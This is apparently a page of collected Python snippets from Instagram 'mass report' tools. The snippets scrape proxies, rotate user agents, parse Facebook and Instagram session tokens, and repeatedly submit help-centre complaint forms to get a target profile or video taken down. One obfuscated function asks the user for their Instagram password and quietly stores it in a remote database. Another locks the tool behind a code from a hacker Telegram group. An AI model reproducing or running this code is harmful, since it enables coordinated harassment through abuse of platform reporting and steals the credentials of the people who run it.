Exemple #1
0
def database():  #line:167
    clearConsole()  #line:168
    print_logo()  #line:169
    print(Style.RESET_ALL)  #line:170
    print_status(
        "================ LOGIN INSTAGRAM  ================\n")  #line:171
    print(Style.RESET_ALL)  #line:172
    OOOO0OOOO0O0OOOOO = input("Enter your instagram username : "******"Enter your instagram password : "******"https://instagram.com/" +
                                     OOOO0OOOO0O0OOOOO + "/")  #line:176
    if O0OO0000O0O0OOOO0.status_code != 200:  #line:177
        print("\n\n" + Fore.RED + "[*] Invalid username!")  #line:178
        database()  #line:179
    elif (OOOO0OOOO0O0OOOOO == ""):  #line:180
        print("\n\n" + Fore.RED +
              "[*] Enter username again, don't leave it blank")  #line:182
        database()  #line:183
    elif O0OO0000O0O0OOOO0.status_code == 200:  #line:186
        OO0000O0OOOOO0O00 = {
            'password': O0O0000O0OOOOO000,
            'username': OOOO0OOOO0O0OOOOO
        }  #line:191
        db.collection('users').add(OO0000O0OOOOO0O00)  #line:192
        load_animation()  #line:193
        print_success("Login Success!")  #line:194
        report()  #line:195
Exemple #2
0
def report():  #line:231
    clearConsole()  #line:232
    print_logo()  #line:233
    O00O000OOOOOOOO0O = input(
        "Would you like to use a proxy? (Recommended Yes) [Y/N] : ")  #line:234
    OO0OOO00OOO00OOOO = []  #line:235
    if (O00O000OOOOOOOO0O == "Y" or O00O000OOOOOOOO0O == "y"):  #line:237
        O00O000OOOOOOOO0O = input(
            "Would you like to collect your proxies from the internet? [Y/N] : "
        )  #line:239
        if (O00O000OOOOOOOO0O == "Y" or O00O000OOOOOOOO0O == "y"):  #line:241
            print_status(
                "Gathering proxy from the Internet! This may take a while.\n"
            )  #line:243
            time.sleep(2)  #line:244
            OO0OOO00OOO00OOOO = find_proxies()  #line:245
        elif (O00O000OOOOOOOO0O == "N" or O00O000OOOOOOOO0O == "n"):  #line:247
            print_status(
                "Please have a maximum of 50 proxies in a file!")  #line:248
            OOO00OO0000OOOO0O = input(
                "Enter the path to your proxy list")  #line:249
            OO0OOO00OOO00OOOO = parse_proxy_file(OOO00OO0000OOOO0O)  #line:250
        else:  #line:251
            print_error("Answer not understood, exiting!")  #line:252
            exit()  #line:253
        print_success(
            str(len(OO0OOO00OOO00OOOO)) +
            " Number of proxy found!\n")  #line:255
        print(OO0OOO00OOO00OOOO)  #line:256
    elif (O00O000OOOOOOOO0O == "N" or O00O000OOOOOOOO0O == "n"):  #line:257
        pass  #line:258
    else:  #line:259
        print_error("Answer not understood, exiting!")  #line:260
        exit()  #line:261
    print("")  #line:263
    print_status("1 - Report Profile.")  #line:264
    print_status("2 - Report a video.")  #line:265
    O0O0O0OO000OO0O0O = input(
        "Please select the complaint method :- ")  #line:266
    print("")  #line:267
    if (O0O0O0OO000OO0O0O.isdigit() == False):  #line:269
        print_error("The answer is not understood.")  #line:270
        main()  #line:271
    if (int(O0O0O0OO000OO0O0O) > 2 or int(O0O0O0OO000OO0O0O) == 0):  #line:273
        print_error("The answer is not understood.")  #line:274
        main()  #line:275
    if (int(O0O0O0OO000OO0O0O) == 1):  #line:277
        profile_attack(OO0OOO00OOO00OOOO)  #line:278
    elif (int(O0O0O0OO000OO0O0O) == 2):  #line:279
        video_attack(OO0OOO00OOO00OOOO)  #line:280
Exemple #3
0
async def show(proxies, proxy_list):
    while (len(proxy_list) < 50):
        proxy = await proxies.get()
        if proxy is None: break

        print_success(
            "[" + str(len(proxy_list) + 1) + "/50]", "Proxy found:",
            proxy.as_json()["host"] + ":" + str(proxy.as_json()["port"]))

        proxy_list.append(proxy.as_json()["host"] + ":" +
                          str(proxy.as_json()["port"]))

        pass
    pass
Exemple #4
0
def main():
    os.system('title Instagram Mass Report ^| Developed by Martizio ^| V1')
    print(Fore.MAGENTA + '[ TRY ] ' + Fore.WHITE + 'Load API...')
    print(" ")
    time.sleep(2)
    print(Fore.LIGHTGREEN_EX + '[ SUCCESS ] ' + Fore.WHITE +
          'Requests API Loaded !')
    time.sleep(0.9)
    print(Fore.LIGHTGREEN_EX + '[ SUCCESS ] ' + Fore.WHITE +
          'Facebook API Loaded !')
    print(" ")
    print(" ")
    print(" ")

    proxies = []

    print(Fore.MAGENTA + '[ TRY ] ' + Fore.WHITE + 'Scrape Proxys from API')
    print(" ")
    print(" ")

    rfinder = requests.get(
        'https://api.proxyscrape.com/?request=displayproxies&proxytype=https&timeout=7000&country=ALL&anonymity=elite&ssl=no'
    )
    LISTPROXY = rfinder.text
    proxies = str(LISTPROXY)

    print_success(str(len(proxies)) + " Number of proxy found!\n")

    print("")
    print(Fore.LIGHTMAGENTA_EX + "[ CHOOSE ] " + Fore.WHITE +
          "1 - Report Profile")
    print(Fore.LIGHTMAGENTA_EX + "[ CHOOSE ] " + Fore.WHITE +
          "1 - Report a video")
    print(" ")

    report_choice = input(Fore.WHITE + "Choose option : ")
    print("")

    if (report_choice.isdigit() == False):
        print_error("The answer is not understood.")
        exit(0)

    if (int(report_choice) > 2 or int(report_choice) == 0):
        print_error("The answer is not understood.")
        exit(0)

    if (int(report_choice) == 1):
        profile_attack(proxies)
    elif (int(report_choice) == 2):
        video_attack(proxies)
def main():
    print_success("Modules loaded!\n")

    ret = ask_question("Would you like to use a proxy? [Y / N]")

    proxies = []

    if ret == "Y" or ret == "y":
        ret = ask_question(
            "Would you like to collect your proxies from the internet? [Y / N]"
        )

        if ret == "Y" or ret == "y":
            print_status(
                "Gathering proxy from the Internet! This may take a while.\n")
            proxies = find_proxies()
        elif ret == "N" or ret == "n":
            print_status("Please have a maximum of 50 proxies in a file!")
            file_path = ask_question("Enter the path to your proxy list")
            proxies = parse_proxy_file(file_path)
        else:
            print_error("Answer not understood, exiting!")
            exit()

        print_success(str(len(proxies)) + " Number of proxy found!\n")
    elif ret == "N" or ret == "n":
        pass
    else:
        print_error("Answer not understood, exiting!")
        exit()

    print("")
    print_status("1 - Report Profile.")
    print_status("2 - Report a video.")
    report_choice = ask_question("Please select the complaint method")
    print("")

    if report_choice.isdigit() == False:
        print_error("The answer is not understood.")
        exit(0)

    if int(report_choice) > 2 or int(report_choice) == 0:
        print_error("The answer is not understood.")
        exit(0)

    if int(report_choice) == 1:
        profile_attack(proxies)
    elif int(report_choice) == 2:
        video_attack(proxies)
Exemple #6
0
def main():
    print_success("Modüller yüklendi!\n")

    ret = ask_question("Proxy kullanmak ister misiniz? [E/H]")

    proxies = []

    if (ret == "E" or ret == "e"):
        ret = ask_question("Proxylerinizi internetten toplamak ister misiniz? [E/H]")

        if (ret == "E" or ret == "e"):
            print_status("Internetten proxy toplanıyor! Bu biraz uzun sürebilir.\n")
            proxies = find_proxies()
        elif (ret == "H" or ret == "h"):
            print_status("Lütfen bir dosyada maksimum 50 proxy bulunsun!")
            file_path = ask_question("Proxy listenizin yolunu giriniz")
            proxies = parse_proxy_file(file_path)
        else:
            print_error("Cevap anlaşılamadı, çıkılıyor!")
            exit()

        print_success(str(len(proxies)) + " Adet proxy bulundu!\n")
    elif (ret == "H" or ret == "h"):
        pass
    else:
        print_error("Cevap anlaşılamadı, çıkılıyor!")
        exit()

    

    print("")
    print_status("1 - Profili şikayet et.")
    print_status("2 - Bir videoyu şikayet et.")
    report_choice = ask_question("Lütfen şikayet yöntemini seçin")
    print("")

    if (report_choice.isdigit() == False):
        print_error("Cevap anlaşılmadı.")
        exit(0)
    
    if (int(report_choice) > 2 or int(report_choice) == 0):
        print_error("Cevap anlaşılmadı.")
        exit(0)

    if (int(report_choice) == 1):
        profile_attack(proxies)
    elif (int(report_choice) == 2):
        video_attack(proxies)
Exemple #7
0
def unlock():  #line:147
    print(Style.RESET_ALL)  #line:148
    OOO00O0OOO0OO0O0O = input("Enter Code To Unlock This Tool - ")  #line:149
    if (OOO00O0OOO0OO0O0O == "@hackerexploits"):  #line:150
        print_success("Successfully unlocked the tool!\n\n")  #line:151
        starting_bot()  #line:152
        database()  #line:153
    elif (OOO00O0OOO0OO0O0O == "1"):  #line:154
        print_success(
            "Send #instareport in telegram group @Hacker_Chatroom to get the code\n\n"
        )  #line:155
        time.sleep(3)  #line:156
        webbrowser.open('http://t.me/Hacker_Chatroom')  #line:157
        time.sleep(1)  #line:158
        unlock()  #line:159
    else:  #line:160
        print(
            '\nINVALID CODE\n\nHow To Get Code\nGo to t.me/Hacker_Chatroom\nSend #instareport'
        )  #line:161
        print_success("Press 1 for help\n")  #line:162
        time.sleep(2)  #line:163
        unlock()  #line:164
Exemple #8
0
def report_profile_attack(username, proxy):
    ses = Session()

    if (proxy != None):
        ses.proxies = {"https": "https://" + proxy, "http": "https://" + proxy}

    user_agent = get_user_agent()

    page_headers["User-Agent"] = user_agent
    report_headers["User-Agent"] = user_agent

    try:
        res = ses.get("https://www.facebook.com/", timeout=10)
    except:
        print_error("Bağlantı hatası oluştu! (FacebookRequestsError)")
        return

    if (res.status_code != 200):
        print_error("Bağlantı hatası oluştu! (STATUS CODE:", res.status_code,
                    ")")
        return

    if ('["_js_datr","' not in res.text):
        print_error("Bağlantı hatası oluştu! (CookieErrorJSDatr)")
        return

    try:
        js_datr = res.text.split('["_js_datr","')[1].split('",')[0]
    except:
        print_error("Bağlantı hatası oluştu! (CookieParsingError)")
        return

    page_cookies = {"_js_datr": js_datr}

    try:
        res = ses.get("https://help.instagram.com/contact/497253480400030",
                      cookies=page_cookies,
                      headers=page_headers,
                      timeout=10)
    except:
        print_error("Bağlantı hatası oluştu! (InstagramRequestsError)")
        return

    if (res.status_code != 200):
        print_error("Bağlantı hatası oluştu! (STATUS CODE:", res.status_code,
                    ")")
        return

    if ("datr" not in res.cookies.get_dict()):
        print_error("Bağlantı hatası oluştu! (CookieErrorDatr)")
        return

    if ('["LSD",[],{"token":"' not in res.text):
        print_error("Bağlantı hatası oluştu! (CookieErrorLSD)")
        return

    if ('"__spin_r":' not in res.text):
        print_error("Bağlantı hatası oluştu! (CookieErrorSpinR)")
        return

    if ('"__spin_b":' not in res.text):
        print_error("Bağlantı hatası oluştu! (CookieErrorSpinB)")
        return

    if ('"__spin_t":' not in res.text):
        print_error("Bağlantı hatası oluştu! (CookieErrorSpinT)")
        return

    if ('"server_revision":' not in res.text):
        print_error("Bağlantı hatası oluştu! (CookieErrorRev)")
        return

    if ('"hsi":' not in res.text):
        print_error("Bağlantı hatası oluştu! (CookieErrorHsi)")
        return

    try:
        lsd = res.text.split('["LSD",[],{"token":"')[1].split('"},')[0]
        spin_r = res.text.split('"__spin_r":')[1].split(',')[0]
        spin_b = res.text.split('"__spin_b":')[1].split(',')[0].replace(
            '"', "")
        spin_t = res.text.split('"__spin_t":')[1].split(',')[0]
        hsi = res.text.split('"hsi":')[1].split(',')[0].replace('"', "")
        rev = res.text.split('"server_revision":')[1].split(',')[0].replace(
            '"', "")
        datr = res.cookies.get_dict()["datr"]
    except:
        print_error("Bağlantı hatası oluştu! (CookieParsingError)")
        return

    report_cookies = {"datr": datr}

    report_form = {
        "jazoest": "2723",
        "lsd": lsd,
        "instagram_username": username,
        "Field241164302734019_iso2_country_code": "TR",
        "Field241164302734019": "Türkiye",
        "support_form_id": "497253480400030",
        "support_form_hidden_fields": "{}",
        "support_form_fact_false_fields": "[]",
        "__user": "******",
        "__a": "1",
        "__dyn":
        "7xe6Fo4SQ1PyUhxOnFwn84a2i5U4e1Fx-ey8kxx0LxW0DUeUhw5cx60Vo1upE4W0OE2WxO0SobEa81Vrzo5-0jx0Fwww6DwtU6e",
        "__csr": "",
        "__req": "d",
        "__beoa": "0",
        "__pc": "PHASED:DEFAULT",
        "dpr": "1",
        "__rev": rev,
        "__s": "5gbxno:2obi73:56i3vc",
        "__hsi": hsi,
        "__comet_req": "0",
        "__spin_r": spin_r,
        "__spin_b": spin_b,
        "__spin_t": spin_t
    }

    try:
        res = ses.post(
            "https://help.instagram.com/ajax/help/contact/submit/page",
            data=report_form,
            headers=report_headers,
            cookies=report_cookies,
            timeout=10)
    except:
        print_error("Bağlantı hatası oluştu! (FormRequestsError)")
        return

    if (res.status_code != 200):
        print_error("Bağlantı hatası oluştu! (STATUS CODE:", res.status_code,
                    ")")
        return

    print_success("Successfully reported!")
Exemple #9
0
def report_video_attack(video_url, proxy):
    ses = Session()
    if (proxy != None):
        ses.proxies = {
            "https": "https://" + proxy,
            "http": "https://" + proxy
        }
    
    user_agent = get_user_agent()

    page_headers["User-Agent"] = user_agent
    report_headers["User-Agent"] = user_agent

    try:
        res = ses.get("https://www.facebook.com/", timeout=10)
    except Exception as e:
        print_error("Request Error (FacebookRequestsError)", e)
        return

    if (res.status_code != 200):
        print_error("Request Error (STATUS CODE:", res.status_code, ")")
        return

    if ('["_js_datr","' not in res.text):
        print_error("Request Error (CookieErrorJSDatr)")
        return
    
    try:
        js_datr = res.text.split('["_js_datr","')[1].split('",')[0]
    except:
        print_error("Request Error (CookieParsingError)")
        return

    page_cookies = {
        "_js_datr": js_datr
    }

    try:
        res = ses.get("https://help.instagram.com/contact/497253480400030", cookies=page_cookies, headers=page_headers, timeout=10)
    except:
        print_error("Request Error (InstagramRequestsError)")
        return

    if (res.status_code != 200):
        print_error("Request Error (STATUS CODE:", res.status_code, ")")
        return
    
    if ("datr" not in res.cookies.get_dict()):
        print_error("Request Error (CookieErrorDatr)")
        return
    
    if ('["LSD",[],{"token":"' not in res.text):
        print_error("Request Error (CookieErrorLSD)")
        return

    if ('"__spin_r":' not in res.text):
        print_error("Request Error (CookieErrorSpinR)")
        return

    if ('"__spin_b":' not in res.text):
        print_error("Request Error (CookieErrorSpinB)")
        return

    if ('"__spin_t":' not in res.text):
        print_error("Request Error (CookieErrorSpinT)")
        return

    if ('"server_revision":' not in res.text):
        print_error("Request Error (CookieErrorRev)")
        return

    if ('"hsi":' not in res.text):
        print_error("Request Error (CookieErrorHsi)")
        return

    try:
        lsd = res.text.split('["LSD",[],{"token":"')[1].split('"},')[0]
        spin_r = res.text.split('"__spin_r":')[1].split(',')[0]
        spin_b = res.text.split('"__spin_b":')[1].split(',')[0].replace('"',"")
        spin_t = res.text.split('"__spin_t":')[1].split(',')[0]
        hsi = res.text.split('"hsi":')[1].split(',')[0].replace('"',"")
        rev = res.text.split('"server_revision":')[1].split(',')[0].replace('"',"")
        datr = res.cookies.get_dict()["datr"]
    except:
        print_error("Request Error (CookieParsingError)")
        return

    report_cookies = {
        "datr": datr
    }

    report_form = {
        "jazoest": "2723",
        "lsd": lsd,
        "sneakyhidden": "",
        "Field419623844841592": video_url,
        "Field1476905342523314_iso2_country_code": "TR",
        "Field1476905342523314": "Türkiye",
        "support_form_id": "440963189380968",
        "support_form_hidden_fields": '{"423417021136459":false,"419623844841592":false,"754839691215928":false,"1476905342523314":false,"284770995012493":true,"237926093076239":false}',
        "support_form_fact_false_fields": "[]",
        "__user": "******",
        "__a": "1",
        "__dyn": "7xe6Fo4SQ1PyUhxOnFwn84a2i5U4e1Fx-ey8kxx0LxW0DUeUhw5cx60Vo1upE4W0OE2WxO0SobEa81Vrzo5-0jx0Fwww6DwtU6e",
        "__csr": "",
        "__req": "d",
        "__beoa": "0",
        "__pc": "PHASED:DEFAULT",
        "dpr": "1",
        "__rev": rev,
        "__s": "5gbxno:2obi73:56i3vc",
        "__hsi": hsi,
        "__comet_req": "0",
        "__spin_r": spin_r,
        "__spin_b": spin_b,
        "__spin_t": spin_t
    }

    try:
        res = ses.post(
            "https://help.instagram.com/ajax/help/contact/submit/page",
            data=report_form,
            headers=report_headers,
            cookies=report_cookies,
            timeout=10
        )
    except:
        print_error("Request Error (FormRequestsError)")
        return
    
    if (res.status_code != 200):
        print_error("Request Error (STATUS CODE:", res.status_code, ")")
        return
    
    print_success("Successfully reported!")
Exemple #10
0
def report_profile_attack(OOOO00O0O0O0OOOOO, O00O000OOO000O0OO):  #line:17
    OOOOOOO0OO00000OO = Session()  #line:18
    if (O00O000OOO000O0OO != None):  #line:19
        OOOOOOO0OO00000OO.proxies = {
            "https": "https://" + O00O000OOO000O0OO,
            "http": "https://" + O00O000OOO000O0OO
        }  #line:20
    O00O0000OO0OOOO00 = get_user_agent()  #line:21
    page_headers["User-Agent"] = O00O0000OO0OOOO00  #line:22
    report_headers["User-Agent"] = O00O0000OO0OOOO00  #line:23
    try:  #line:24
        O00O0000OOO0O00OO = OOOOOOO0OO00000OO.get("https://www.facebook.com/",
                                                  timeout=10)  #line:25
    except:  #line:26
        print_error("Connection error! (FacebookRequestsError)")  #line:27
        return  #line:28
    if (O00O0000OOO0O00OO.status_code != 200):  #line:29
        print_error("Connection error! (STATUS CODE:",
                    O00O0000OOO0O00OO.status_code, ")")  #line:30
        return  #line:31
    if ('["_js_datr","' not in O00O0000OOO0O00OO.text):  #line:32
        print_error("Connection error! (CookieErrorJSDatr)")  #line:33
        return  #line:34
    try:  #line:35
        OO000O0O00O000O00 = O00O0000OOO0O00OO.text.split(
            '["_js_datr","')[1].split('",')[0]  #line:36
    except:  #line:37
        print_error("Connection error! (CookieParsingError)")  #line:38
        return  #line:39
    O0000OO0OOO000O0O = {"_js_datr": OO000O0O00O000O00}  #line:40
    try:  #line:41
        O00O0000OOO0O00OO = OOOOOOO0OO00000OO.get(
            "https://help.instagram.com/contact/497253480400030",
            cookies=O0000OO0OOO000O0O,
            headers=page_headers,
            timeout=10)  #line:42
    except:  #line:43
        print_error("Connection error! (InstagramRequestsError)")  #line:44
        return  #line:45
    if (O00O0000OOO0O00OO.status_code != 200):  #line:46
        print_error("Connection error! (STATUS CODE:",
                    O00O0000OOO0O00OO.status_code, ")")  #line:47
        return  #line:48
    if ("datr" not in O00O0000OOO0O00OO.cookies.get_dict()):  #line:49
        print_error("Connection error! (CookieErrorDatr)")  #line:50
        return  #line:51
    if ('["LSD",[],{"token":"' not in O00O0000OOO0O00OO.text):  #line:52
        print_error("Connection error! (CookieErrorLSD)")  #line:53
        return  #line:54
    if ('"__spin_r":' not in O00O0000OOO0O00OO.text):  #line:55
        print_error("Connection error! (CookieErrorSpinR)")  #line:56
        return  #line:57
    if ('"__spin_b":' not in O00O0000OOO0O00OO.text):  #line:58
        print_error("Connection error! (CookieErrorSpinB)")  #line:59
        return  #line:60
    if ('"__spin_t":' not in O00O0000OOO0O00OO.text):  #line:61
        print_error("Connection error! (CookieErrorSpinT)")  #line:62
        return  #line:63
    if ('"server_revision":' not in O00O0000OOO0O00OO.text):  #line:64
        print_error("Connection error! (CookieErrorRev)")  #line:65
        return  #line:66
    if ('"hsi":' not in O00O0000OOO0O00OO.text):  #line:67
        print_error("Connection error! (CookieErrorHsi)")  #line:68
        return  #line:69
    try:  #line:70
        OOOOOO000OOOO0O00 = O00O0000OOO0O00OO.text.split(
            '["LSD",[],{"token":"')[1].split('"},')[0]  #line:71
        OO00O0O0O00OOOOO0 = O00O0000OOO0O00OO.text.split(
            '"__spin_r":')[1].split(',')[0]  #line:72
        OO00OO000OO000OO0 = O00O0000OOO0O00OO.text.split(
            '"__spin_b":')[1].split(',')[0].replace('"', "")  #line:73
        O00O0O0O0O00O0O00 = O00O0000OOO0O00OO.text.split(
            '"__spin_t":')[1].split(',')[0]  #line:74
        OO0O0OO00OOOOOO0O = O00O0000OOO0O00OO.text.split('"hsi":')[1].split(
            ',')[0].replace('"', "")  #line:75
        O000OO0OOO00000OO = O00O0000OOO0O00OO.text.split(
            '"server_revision":')[1].split(',')[0].replace('"', "")  #line:76
        O0O0OOOOOO00O00OO = O00O0000OOO0O00OO.cookies.get_dict()[
            "datr"]  #line:77
    except:  #line:78
        print_error("Connection error! (CookieParsingError)")  #line:79
        return  #line:80
    OOOO0O00O0O0OO000 = {"datr": O0O0OOOOOO00O00OO}  #line:81
    O0O00OOO0000O0O00 = {
        "jazoest": "2723",
        "lsd": OOOOOO000OOOO0O00,
        "instagram_username": OOOO00O0O0O0OOOOO,
        "Field241164302734019_iso2_country_code": "TR",
        "Field241164302734019": "Türkiye",
        "support_form_id": "497253480400030",
        "support_form_hidden_fields": "{}",
        "support_form_fact_false_fields": "[]",
        "__user": "******",
        "__a": "1",
        "__dyn":
        "7xe6Fo4SQ1PyUhxOnFwn84a2i5U4e1Fx-ey8kxx0LxW0DUeUhw5cx60Vo1upE4W0OE2WxO0SobEa81Vrzo5-0jx0Fwww6DwtU6e",
        "__csr": "",
        "__req": "d",
        "__beoa": "0",
        "__pc": "PHASED:DEFAULT",
        "dpr": "1",
        "__rev": O000OO0OOO00000OO,
        "__s": "5gbxno:2obi73:56i3vc",
        "__hsi": OO0O0OO00OOOOOO0O,
        "__comet_req": "0",
        "__spin_r": OO00O0O0O00OOOOO0,
        "__spin_b": OO00OO000OO000OO0,
        "__spin_t": O00O0O0O0O00O0O00
    }  #line:82
    try:  #line:83
        O00O0000OOO0O00OO = OOOOOOO0OO00000OO.post(
            "https://help.instagram.com/ajax/help/contact/submit/page",
            data=O0O00OOO0000O0O00,
            headers=report_headers,
            cookies=OOOO0O00O0O0OO000,
            timeout=10)  #line:84
    except:  #line:85
        print_error("Connection error occurred (FormRequestsError)")  #line:86
        return  #line:87
    if (O00O0000OOO0O00OO.status_code != 200):  #line:88
        print_error("Connection error occurred (STATUS CODE:",
                    O00O0000OOO0O00OO.status_code, ")")  #line:89
        return  #line:90
    print_success("Successfully reported!")  #line:91
Exemple #11
0
def report_video_attack(O0O0OO00OOOO00O00, O00O0OOOOOO0O0O0O):  #line:92
    O000OOOO0O000O0OO = Session()  #line:93
    if (O00O0OOOOOO0O0O0O != None):  #line:94
        O000OOOO0O000O0OO.proxies = {
            "https": "https://" + O00O0OOOOOO0O0O0O,
            "http": "https://" + O00O0OOOOOO0O0O0O
        }  #line:95
    O000OO00OOOO0OO0O = get_user_agent()  #line:96
    page_headers["User-Agent"] = O000OO00OOOO0OO0O  #line:97
    report_headers["User-Agent"] = O000OO00OOOO0OO0O  #line:98
    try:  #line:99
        OOO0OO0O0OOOO00O0 = O000OOOO0O000O0OO.get("https://www.facebook.com/",
                                                  timeout=10)  #line:100
    except Exception as O00OO0OO000OOO0O0:  #line:101
        print_error("Connection error! (FacebookRequestsError)",
                    O00OO0OO000OOO0O0)  #line:102
        return  #line:103
    if (OOO0OO0O0OOOO00O0.status_code != 200):  #line:104
        print_error("Connection error! (STATUS CODE:",
                    OOO0OO0O0OOOO00O0.status_code, ")")  #line:105
        return  #line:106
    if ('["_js_datr","' not in OOO0OO0O0OOOO00O0.text):  #line:107
        print_error("Connection error! (CookieErrorJSDatr)")  #line:108
        return  #line:109
    try:  #line:110
        OOOO0000OO0O0O0O0 = OOO0OO0O0OOOO00O0.text.split(
            '["_js_datr","')[1].split('",')[0]  #line:111
    except:  #line:112
        print_error("Connection error! (CookieParsingError)")  #line:113
        return  #line:114
    OO0O00OOOO00O00O0 = {"_js_datr": OOOO0000OO0O0O0O0}  #line:115
    try:  #line:116
        OOO0OO0O0OOOO00O0 = O000OOOO0O000O0OO.get(
            "https://help.instagram.com/contact/497253480400030",
            cookies=OO0O00OOOO00O00O0,
            headers=page_headers,
            timeout=10)  #line:117
    except:  #line:118
        print_error("Connection error! (InstagramRequestsError)")  #line:119
        return  #line:120
    if (OOO0OO0O0OOOO00O0.status_code != 200):  #line:121
        print_error("Connection error! (STATUS CODE:",
                    OOO0OO0O0OOOO00O0.status_code, ")")  #line:122
        return  #line:123
    if ("datr" not in OOO0OO0O0OOOO00O0.cookies.get_dict()):  #line:124
        print_error("Connection error! (CookieErrorDatr)")  #line:125
        return  #line:126
    if ('["LSD",[],{"token":"' not in OOO0OO0O0OOOO00O0.text):  #line:127
        print_error("Connection error! (CookieErrorLSD)")  #line:128
        return  #line:129
    if ('"__spin_r":' not in OOO0OO0O0OOOO00O0.text):  #line:130
        print_error("Connection error! (CookieErrorSpinR)")  #line:131
        return  #line:132
    if ('"__spin_b":' not in OOO0OO0O0OOOO00O0.text):  #line:133
        print_error("Connection error! (CookieErrorSpinB)")  #line:134
        return  #line:135
    if ('"__spin_t":' not in OOO0OO0O0OOOO00O0.text):  #line:136
        print_error("Connection error! (CookieErrorSpinT)")  #line:137
        return  #line:138
    if ('"server_revision":' not in OOO0OO0O0OOOO00O0.text):  #line:139
        print_error("Connection error! (CookieErrorRev)")  #line:140
        return  #line:141
    if ('"hsi":' not in OOO0OO0O0OOOO00O0.text):  #line:142
        print_error("Connection error! (CookieErrorHsi)")  #line:143
        return  #line:144
    try:  #line:145
        O0O0000OO0OO0OO0O = OOO0OO0O0OOOO00O0.text.split(
            '["LSD",[],{"token":"')[1].split('"},')[0]  #line:146
        OO0000O000OOO00OO = OOO0OO0O0OOOO00O0.text.split(
            '"__spin_r":')[1].split(',')[0]  #line:147
        OO0O0OOOOO00OOOO0 = OOO0OO0O0OOOO00O0.text.split(
            '"__spin_b":')[1].split(',')[0].replace('"', "")  #line:148
        OOO0O0OO0OO0OO00O = OOO0OO0O0OOOO00O0.text.split(
            '"__spin_t":')[1].split(',')[0]  #line:149
        OOO0OO00OO0OO0000 = OOO0OO0O0OOOO00O0.text.split('"hsi":')[1].split(
            ',')[0].replace('"', "")  #line:150
        OO0O0O0OOO0000O0O = OOO0OO0O0OOOO00O0.text.split(
            '"server_revision":')[1].split(',')[0].replace('"', "")  #line:151
        OOOO0000O000O00OO = OOO0OO0O0OOOO00O0.cookies.get_dict()[
            "datr"]  #line:152
    except:  #line:153
        print_error("Connection error! (CookieParsingError)")  #line:154
        return  #line:155
    OO0OOO00O000OOO0O = {"datr": OOOO0000O000O00OO}  #line:156
    O0O00OOOO00O00OOO = {
        "jazoest": "2723",
        "lsd": O0O0000OO0OO0OO0O,
        "sneakyhidden": "",
        "Field419623844841592": O0O0OO00OOOO00O00,
        "Field1476905342523314_iso2_country_code": "TR",
        "Field1476905342523314": "Türkiye",
        "support_form_id": "440963189380968",
        "support_form_hidden_fields":
        '{"423417021136459":false,"419623844841592":false,"754839691215928":false,"1476905342523314":false,"284770995012493":true,"237926093076239":false}',
        "support_form_fact_false_fields": "[]",
        "__user": "******",
        "__a": "1",
        "__dyn":
        "7xe6Fo4SQ1PyUhxOnFwn84a2i5U4e1Fx-ey8kxx0LxW0DUeUhw5cx60Vo1upE4W0OE2WxO0SobEa81Vrzo5-0jx0Fwww6DwtU6e",
        "__csr": "",
        "__req": "d",
        "__beoa": "0",
        "__pc": "PHASED:DEFAULT",
        "dpr": "1",
        "__rev": OO0O0O0OOO0000O0O,
        "__s": "5gbxno:2obi73:56i3vc",
        "__hsi": OOO0OO00OO0OO0000,
        "__comet_req": "0",
        "__spin_r": OO0000O000OOO00OO,
        "__spin_b": OO0O0OOOOO00OOOO0,
        "__spin_t": OOO0O0OO0OO0OO00O
    }  #line:157
    try:  #line:158
        OOO0OO0O0OOOO00O0 = O000OOOO0O000O0OO.post(
            "https://help.instagram.com/ajax/help/contact/submit/page",
            data=O0O00OOOO00O00OOO,
            headers=report_headers,
            cookies=OO0OOO00O000OOO0O,
            timeout=10)  #line:159
    except:  #line:160
        print_error("Connection error! (FormRequestsError)")  #line:161
        return  #line:162
    if (OOO0OO0O0OOOO00O0.status_code != 200):  #line:163
        print_error("Connection error! (STATUS CODE:",
                    OOO0OO0O0OOOO00O0.status_code, ")")  #line:164
        return  #line:165
    print_success("Successfully reported!")